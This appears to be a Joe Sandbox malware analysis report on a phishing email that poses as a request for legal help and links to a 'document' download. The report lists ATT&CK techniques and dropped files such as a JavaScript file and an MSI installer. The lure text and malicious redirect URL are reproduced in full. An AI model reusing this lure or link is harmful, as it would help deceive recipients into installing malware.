File name:	Seeking Assistance for Legal Assistance in a Medical Matter.msg
File size:	111'104 bytes
MD5:	2cf1168765d32bfeabdba8692c734e70
SHA1:	98c343eba029ba8bcbf4721e4fc2ece5e8572b3d
SHA256:	b7f0263d4086be9bbe1e5bc8ba92ac32642b0e0fa0cf580b2f8c64ce5f080f20
SHA512:	1cec60cd0e5060a0bf55356cfcfc2661e9df6eae49c83a17a85cc90709698414e43d032ea13219cc53bda1fe38ee658042f9c12e1bf6730befcf616948f94071
SSDEEP:	1536:rTx/Uv+HW6HWcro/2Ro/2DQoWWpdXnCWEuoWSWSW4GhGwfzkYGZW1P:rGvcrlouoqQ1WDyBkbfzk1A
TLSH:	4FB3342439EA0119F3779F358BE290AB8526FD52AD24965F3195330E0A72941EC63F3F
File Content Preview:	........................>......................................................................................................................................................................................................................................

Static Mail

General

Subject:	Seeking Assistance for Legal Assistance in a Medical Matter
From:	Earl Chang <jerricahol2005@gmx.com>
To:	igonzale@tularehhsa.org
Cc:
BCC:
Date:	Tue, 01 Oct 2024 18:19:21 +0200
Communications:	Dear Sir/Madam, I am in need of legal assistance for a challenging situation related to medical law. Due to the confidential nature of this matter, I have prepared a comprehensive file outlining the specifics. Download document. I am keen to ZjQcmQRYFpfptBannerStart This Message Is From an Untrusted Sender You have not previously corresponded with this sender. ZjQcmQRYFpfptBannerEnd Dear Sir/Madam, I am in need of legal assistance for a challenging situation related to medical law. Due to the confidential nature of this matter, I have prepared a comprehensive file outlining the specifics. Download document. <https://urldefense.com/v3/__http://hub-res.selvas.com/market/fatalraid/zh-HK/hub.html?download_url=https:**Ameatmsges.com__;Ly8!!HOHAxFA!VcGeDKmsfWMmpgiczkE2C50slN-Hw5GiQOAVWf2PymTSe6F4ylwVebwl882vHrUIqRx7-X8g7MyiP2dsxGEV925K2yY$> I am keen to know whether your firm can assist in this case and would appreciate it if you could provide an initial assessment based on the attached details. Additionally, please inform me of the estimated fees associated with your legal services. I look forward to your response regarding this matter. Best regards, Earl Chang
Attachments:

Headers

Key	Value
Received	from 103.104.183.18 ([103.104.183.18]) by mail.gmx.net (mrgmx105
16	19:44 +0000
by DS0PR09MB11236.namprd09.prod.outlook.com (2603	10b6:8:172::12) with
2024 16	19:40 +0000
(2603	10b6:5:160::16) with Microsoft SMTP Server (version=TLS1_2,
Transport; Tue, 1 Oct 2024 16	19:40 +0000
Authentication-Results	spf=softfail (sender IP is 205.220.178.166)
Received-SPF	SoftFail (protection.outlook.com: domain of transitioning
15.20.8026.11 via Frontend Transport; Tue, 1 Oct 2024 16	19:39 +0000
for <igonzale@tularehhsa.org>; Tue, 1 Oct 2024 09	19:39 -0700
Authentication-Results-Original	ppops.net; spf=pass
for <igonzale@tularehhsa.org>; Tue, 01 Oct 2024 09	19:38 -0700 (PDT)
DKIM-Signature	v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmx.com;
h=X-UI-Sender-Class	Message-ID:From:To:Subject:Date:MIME-Version:
Content-Type	cc:content-transfer-encoding:content-type:date:from:
message-id	mime-version:reply-to:subject:to;
X-UI-Sender-Class	724b4f7f-cbec-4199-ad4e-598c01a50d3a
<igonzale@tularehhsa.org>; Tue, 01 Oct 2024 18	19:36 +0200
Message-ID	<0f91dd7682165853758fc66d93476c7362425b@gmx.com>
From	Earl Chang <jerricahol2005@gmx.com>
To	igonzale@tularehhsa.org
Subject	Seeking Assistance for Legal Assistance in a Medical Matter
Date	Tue, 1 Oct 2024 19:19:21 +0300
Content-Type	multipart/alternative; boundary="09a3ea1181456a3112b8fb40b5655c37f2"
X-Provags-ID	V03:K1:TNmw1DdLH/EQNZGSFFbWlDjMivqEviYs/2QKVFwSI+ECOboz0bZ
X-Spam-Flag	NO
UI-OutboundReport	notjunk:1;M01:P0:CFfWx/JeMdI=;2K8uvm3/TN5Od5drhYwpQ2DTRt1
X-CLX-Shades	MLX
X-CLX-Response	1TFkXGx4aEQpMehcbGBwRCllEF2NneX9CE3lOT0kdEQpYWBdjQ31NRAVmYGh uQREKeE4XaXgBWEltY08eGUYRCnlMF20SbkN9E1NwGWxFEQpDSBcbEhwRCkNZFwcbHB8RCkNeFw cYExEKXkQXGBwSHhkfHh8cEQpDSRcaBBoaGhEKWU0XZ2ZyEQpfWRcYGh4RCl9NF2dmchEKWUkXB
X-Proofpoint-ORIG-GUID	r4aEh7QTJ9xGg6PIctoanpUa1sg_FKjz
X-Proofpoint-GUID	r4aEh7QTJ9xGg6PIctoanpUa1sg_FKjz
MIME-Version	1.0
X-Proofpoint-Banner-Trigger	unknownsender
X-Proofpoint-Virus-Version	vendor=baseguard
engine=ICAP	2.0.293,Aquarius:18.0.1039,Hydra:6.0.680,FMLib:17.12.60.29
X-Proofpoint-Spam-Details	rule=inbound_notspam policy=inbound score=0 priorityscore=126 mlxscore=0
X-Proofpoint-SPAM-Disposition	Inbox
Return-Path	jerricahol2005@gmx.com
X-MS-Exchange-Organization-ExpirationStartTime	01 Oct 2024 16:19:39.7968
X-MS-Exchange-Organization-ExpirationStartTimeReason	OriginalSubmit
X-MS-Exchange-Organization-ExpirationInterval	1:00:00:00.0000000
X-MS-Exchange-Organization-ExpirationIntervalReason	OriginalSubmit
X-MS-Exchange-Organization-Network-Message-Id	fd758f13-b9c9-4b09-75a3-08dce234d9ad
X-EOPAttributedMessage	0
X-EOPTenantAttributedMessage	e9ab118a-9355-41a6-aaad-633046c798b9:0
X-MS-Exchange-Organization-MessageDirectionality	Incoming
X-MS-PublicTrafficType	Email
X-MS-TrafficTypeDiagnostic	DS4PEPF00000170:EE_\|DS0PR09MB11236:EE_\|BY5PR09MB5537:EE_
X-MS-Exchange-Organization-AuthSource	DS4PEPF00000170.namprd09.prod.outlook.com
X-MS-Exchange-Organization-AuthAs	Anonymous
X-MS-Office365-Filtering-Correlation-Id	fd758f13-b9c9-4b09-75a3-08dce234d9ad
X-MS-Exchange-AtpMessageProperties	SA\|SL
X-MS-Exchange-Organization-SCL	-1
X-Microsoft-Antispam	BCL:0;ARA:13230040\|7093399012;
X-Forefront-Antispam-Report	CIP:205.220.178.166;CTRY:US;LANG:en;SCL:-1;SRV:;IPV:NLI;SFV:NSPM;H:mx0b-001dbd01.pphosted.com;PTR:mx0b-001dbd01.pphosted.com;CAT:NONE;SFS:(13230040)(7093399012);DIR:INB;
X-MS-Exchange-CrossTenant-OriginalArrivalTime	01 Oct 2024 16:19:39.6249
X-MS-Exchange-CrossTenant-Network-Message-Id	fd758f13-b9c9-4b09-75a3-08dce234d9ad
X-MS-Exchange-CrossTenant-Id	e9ab118a-9355-41a6-aaad-633046c798b9
X-MS-Exchange-CrossTenant-AuthSource	DS4PEPF00000170.namprd09.prod.outlook.com
X-MS-Exchange-CrossTenant-AuthAs	Anonymous
X-MS-Exchange-CrossTenant-FromEntityHeader	Internet
X-MS-Exchange-Transport-CrossTenantHeadersStamped	DS0PR09MB11236
X-MS-Exchange-Transport-EndToEndLatency	00:00:05.1767264
X-MS-Exchange-Processed-By-BccFoldering	15.20.8026.016
X-Microsoft-Antispam-Mailbox-Delivery	ucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003);
X-Microsoft-Antispam-Message-Info	=?us-ascii?Q?aRMxsPu3feocZuH7HZ0UpSQLeOWe/zyruxVr0MkiZSYp4PX4YLmgsclFq4Kb?=
date	Tue, 01 Oct 2024 18:19:21 +0200

File Icon


Icon Hash:	c4e1928eacb280a2

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Seeking Assistance for Legal Assistance in a Medical Matter.msg

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

LLM Input / Output

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-shm

C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-wal

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{BA8BC689-4508-42A7-860E-72A84D5DEA87}.tmp

C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1727809889449589100_788F31EA-2F3C-4272-B9FF-0982A142ACBB.log

C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1727809889450241600_788F31EA-2F3C-4272-B9FF-0982A142ACBB.log

C:\Users\user\AppData\Local\Temp\MW-3a472122-7dab-4a13-bbad-34a4c913bf53\files.cab

C:\Users\user\AppData\Local\Temp\MW-3a472122-7dab-4a13-bbad-34a4c913bf53\files\b867728e2fb94adfa8d9d574fa44f90b$dpx$.tmp\393b823aa8821f409caf2aa8798668c0.tmp

C:\Users\user\AppData\Local\Temp\MW-3a472122-7dab-4a13-bbad-34a4c913bf53\msiwrapper.ini

C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241001T1511290258-4868.etl

C:\Users\user\AppData\Local\Temp\~DFC80FC6DE138A2545.TMP

C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

C:\Users\user\Downloads\16cd823e-e460-45af-bf8e-0b5f8d92a4e5.tmp

C:\Users\user\Downloads\81057dd7-b350-4f69-b6a0-fcc073956d9a.tmp

C:\Users\user\Downloads\MyCase_09.2024_825.js (copy)

C:\Users\user\Downloads\Unconfirmed 200405.crdownload

C:\Users\user\Downloads\Unconfirmed 3640.crdownload

C:\Windows\Installer\528ed3.msi

C:\Windows\Installer\MSI900C.tmp

Chrome Cache Entry: 73

\Device\ConDrv

Static File Info

General

Windows Analysis Report
Seeking Assistance for Legal Assistance in a Medical Matter.msg